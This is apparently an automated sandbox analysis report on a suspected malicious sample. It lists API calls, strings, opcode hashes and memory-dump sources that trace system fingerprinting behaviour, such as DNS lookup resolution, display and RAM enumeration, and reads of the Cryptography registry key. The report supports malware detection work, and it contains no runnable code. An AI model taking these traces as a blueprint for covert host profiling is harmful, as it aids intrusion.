                                                                                                            • String ID: DnsQuery_A$dnsapi.dll
                                                                                                            • API String ID: 2574300362-3847274415
                                                                                                            • Opcode ID: b21d0736972aa36b19cf06e066042d1d2d022ed966ff61fac985e7aef83e4a1a
                                                                                                            • Instruction ID: d30c321fe4a2bd247bd4b698bf20639808d2184671dfbaabedb686dc3f8753d1
                                                                                                            • Opcode Fuzzy Hash: b21d0736972aa36b19cf06e066042d1d2d022ed966ff61fac985e7aef83e4a1a
                                                                                                            • Instruction Fuzzy Hash: 76119070944644AED701DBB9CC52B9EBBF8DF49714F5140B7F804E72D2D6789E008B58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041763E,?,00000000,00000011,00000000), ref: 004175CD
                                                                                                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: DnsQuery_A$dnsapi.dll
                                                                                                            • API String ID: 2574300362-3847274415
                                                                                                            • Opcode ID: 513ae74a452d945e18968ac4004f5b6a56348936cd96268495f2825fd343ced3
                                                                                                            • Instruction ID: 89091d3917c39e027ec3eeccc89b87ee5cdcb6cd8aa522463c3fbed3da073618
                                                                                                            • Opcode Fuzzy Hash: 513ae74a452d945e18968ac4004f5b6a56348936cd96268495f2825fd343ced3
                                                                                                            • Instruction Fuzzy Hash: 68118FB1A44604AEDB11DFA9CD42B9EBBF8EB49714F5140BBF804E72D1D6789E008B58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,00415E29,?,-00000001,?,?,?,00415F7F,Video Info,?,004160C8,?,GetRAM: ,?), ref: 00415D94
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00415D9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: EnumDisplayDevicesW$user32.dll
                                                                                                            • API String ID: 2574300362-1693391355
                                                                                                            • Opcode ID: e49b902f07a980a003c294d4dc7f468fc02d54e415eed80baa828219ab7e1142
                                                                                                            • Instruction ID: 996778e6e1fa3012b08ba28900446386cc223bdcaff6e7a2921523f1031bab31
                                                                                                            • Opcode Fuzzy Hash: e49b902f07a980a003c294d4dc7f468fc02d54e415eed80baa828219ab7e1142
                                                                                                            • Instruction Fuzzy Hash: AD11B970A00A18DFD761DF61CC45BDABBBDEBC4705F1040FAE408A6291D6785F848A58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041763E,?,00000000,00000011,00000000), ref: 004175CD
                                                                                                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: DnsQuery_A$dnsapi.dll
                                                                                                            • API String ID: 2574300362-3847274415
                                                                                                            • Opcode ID: b5114bd0f2838a1c62086145bd7ce8d428bdae928ed29eadb9123bea7991a88f
                                                                                                            • Instruction ID: b99d0aac83a0b3c72d6054ef8d9202edd35a9011c0e0381adc81f7c85d7bf011
                                                                                                            • Opcode Fuzzy Hash: b5114bd0f2838a1c62086145bd7ce8d428bdae928ed29eadb9123bea7991a88f
                                                                                                            • Instruction Fuzzy Hash: F41151B1A44608AED750DFA9CD42B9EBBF8EB48714F514477F904E72C1E6789E008B58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C), ref: 0040E824
                                                                                                            • 6BD677D0.KERNEL32(00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C,00000001,?), ref: 0040E866
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocD67450D677String
                                                                                                            • String ID: %TEMP%\curbuf.dat
                                                                                                            • API String ID: 3586935142-3767633259
                                                                                                            • Opcode ID: a80c2e18994b5b251d51abf03e9ac8fefd6a39a3b9b2048d6b5d44808e33a571
                                                                                                            • Instruction ID: 82a9ed53c2a697d02335697899508965461685f21aee0589c72fe3466f83eb79
                                                                                                            • Opcode Fuzzy Hash: a80c2e18994b5b251d51abf03e9ac8fefd6a39a3b9b2048d6b5d44808e33a571
                                                                                                            • Instruction Fuzzy Hash: 4D211271A00209EBDB00FBA6D94299EB7B8EF44309F50897BF400B32D1D738AE11965D
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                                                                                                              • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                              • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                              • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                              • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                            • String ID: ^
                                                                                                            • API String ID: 2227675388-551292248
                                                                                                            • Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                            • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                                                                                                            • Opcode Fuzzy Hash: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                            • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 30 2aa9b9c-2aa9ba6 31 2aa9c3f-2aa9c47 30->31 32 2aa9bac 30->32 33 2aa9c49-2aa9c50 31->33 34 2aa9c56-2aa9c5e 31->34 35 2aa9c72-2aa9c74 32->35 36 2aa9bb2-2aa9bd6 CreateFileMappingW 32->36 33->34 37 2aa9c6d call 2aa7348 34->37 38 2aa9c60-2aa9c67 34->38 39 2aa9bd8-2aa9be1 36->39 40 2aa9be6-2aa9c15 MapViewOfFile 36->40 37->35 38->37 39->35 43 2aa9c38 call 2aa7328 40->43 44 2aa9c17-2aa9c31 40->44 47 2aa9c3d 43->47 44->43 47->35
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000028,{A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}), ref: 02AA9BC1
                                                                                                            • MapViewOfFile.KERNELBASE(02AB350C,00000006,00000000,00000000,00000028,?), ref: 02AA9C04
                                                                                                            Strings
                                                                                                            • {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}, xrefs: 02AA9BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.2244116625.0000000002A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2a21000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER}
                                                                                                            • API String ID: 3452162329-4124573863
                                                                                                            • Opcode ID: d90a040c4f2990d04b8d942ded53de4baab1ae86a7f677fd1f99ac0b0d1d3b5a
                                                                                                            • Instruction ID: 7055e5cd4775c1af6e299ba37a6992d7c534126aea15cc0e542c4bf60ea08189
                                                                                                            • Opcode Fuzzy Hash: d90a040c4f2990d04b8d942ded53de4baab1ae86a7f677fd1f99ac0b0d1d3b5a
                                                                                                            • Instruction Fuzzy Hash: FE213834AC4601EFDB12DFA8D995B0A77E6AF4A720F108695E510DB3A1CF70E851CF11

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 107 2aa988c-2aa9898 108 2aa989a-2aa98b0 107->108 109 2aa98b2-2aa98bb 107->109 113 2aa98fb-2aa9900 108->113 110 2aa98dc-2aa98f8 109->110 111 2aa98bd-2aa98d7 PostMessageW 109->111 110->113 111->110
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(025E0000,02AB940C,?,?), ref: 02AA98D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.2244116625.0000000002A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2a21000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: c393d234b624bbbee664fc133f04ec3e163974ae9c3a873a85983ef070d50672
                                                                                                            • Instruction ID: ea4ef6da9a939624762299fe0663d42308763890a0ee4687cfe65f793dbe27d8
                                                                                                            • Opcode Fuzzy Hash: c393d234b624bbbee664fc133f04ec3e163974ae9c3a873a85983ef070d50672
                                                                                                            • Instruction Fuzzy Hash: 2F116375A40249EFCB40DF9CD980E9A77E9AF0D360B008545F918DB361CB30E951DF65
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 02A19CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02A19D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02A19DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02A19DD7
                                                                                                              • Part of subcall function 02A19C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02A19D55), ref: 02A19CAB
                                                                                                              • Part of subcall function 02A19C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02A19D55), ref: 02A19CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.2244116625.0000000002A11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 02A11000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2a11000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 53f204b2ebd43a88787451ffc932c3ab926ea079901bbfd9ed52cb18fca21762
                                                                                                            • Instruction ID: f48c69d77f5b641d9e76844874a4c43bd19b902fa1fc63ac0f36653bd9530f8d
                                                                                                            • Opcode Fuzzy Hash: 53f204b2ebd43a88787451ffc932c3ab926ea079901bbfd9ed52cb18fca21762
                                                                                                            • Instruction Fuzzy Hash: F9315C70E4021A9BDF10EFE8C890AAFB7B9FF08324F404566D555E7295EF74AA05CB90